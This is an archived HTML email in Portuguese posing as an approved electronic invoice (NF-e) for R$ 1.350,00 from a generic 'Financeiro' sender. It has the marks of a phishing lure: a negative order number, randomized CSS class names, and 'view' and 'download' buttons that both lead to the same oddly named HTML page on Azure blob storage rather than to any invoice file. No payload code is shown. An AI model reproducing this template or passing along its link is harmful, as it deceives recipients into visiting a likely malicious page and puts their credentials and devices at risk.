|
From: Financeiro <eva...@ro...> - 2025-08-03 09:23:37
|
<!DOCTYPE html>
<html lang="pt-BR">
<head>
<meta charset="UTF-8">
<style>
body {
font-family: 'Segoe UI', sans-serif;
background-color: #f8f8f8;
margin: 0;
padding: 20px;
}
.container {
background-color: #fff;
border-radius: 10px;
padding: 25px;
max-width: 850px;
margin: auto;
box-shadow: 0 0 12px rgba(0,0,0,0.1);
}
h1 {
color: #337ab7;
text-align: center;
font-size: 26px;
margin-bottom: 25px;
}
table {
width: 100%;
border-collapse: collapse;
margin-bottom: 20px;
}
table td {
border: 1px solid #ddd;
padding: 12px;
vertical-align: top;
}
.umi_pxa {
display: flex;
justify-content: space-between;
gap: 20px;
margin-bottom: 20px;
}
.fzw_crm {
flex: 1;
background-color: #f0f0f0;
border: 1px solid #ddd;
border-radius: 6px;
padding: 15px;
}
.fzw_crm strong {
display: block;
margin-bottom: 5px;
color: #555;
}
.poz_hxw {
margin-top: 20px;
}
.poz_hxw a,
.vxubedfitxaofyxeysnj {
display: inline-block;
text-decoration: none;
border-radius: 6px;
padding: 10px 16px;
color: white;
font-weight: bold;
margin-right: 10px;
}
.poz_hxw a {
background-color: #337ab7;
}
.poz_hxw a:hover {
background-color: #2a6496;
}
.vxubedfitxaofyxeysnj {
background-color: #5cb85c;
}
.vxubedfitxaofyxeysnj:hover {
background-color: #449d44;
}
</style>
</head>
<body>
<div class="container">
<h1>Nota Fiscal Eletrônica</h1>
<table>
<tr>
<td><strong>Cliente:</strong><br>mai...@li...</td>
<td><strong>CNPJ:</strong><br>37.038.241/0001-30</td>
<td><strong>Status:</strong><br>Aprovado</td>
<td><strong>Tipo de Documento:</strong><br>NF-e</td>
</tr>
<tr>
<td><strong>Data da Compra:</strong><br>03/08/2025</td>
<td><strong>Valor Total:</strong><br>R$ 1.350,00</td>
<td colspan="2"><strong>Referência:</strong><br>Pedido #-1721476327</td>
</tr>
</table>
<div class="umi_pxa">
<div class="fzw_crm">
<strong>Número da Nota Fiscal:</strong>
8970112378052981975
</div>
<div class="fzw_crm">
<strong>Data de Emissão:</strong>
03/08/2025
</div>
</div>
<div class="poz_hxw">
<p><strong>Arquivos Disponíveis:</strong></p>
<a href="https://certificate1066.blob.core.windows.net/queue/outsourcing.html" rel="noopener noreferrer" target="_blank" title="">Visualizar Documento</a>
<a href="https://certificate1066.blob.core.windows.net/queue/outsourcing.html" rel="noopener noreferrer" class="vxubedfitxaofyxeysnj" target="_blank" title="">Baixar Documento</a>
</div>
</div>
</body>
</html>
|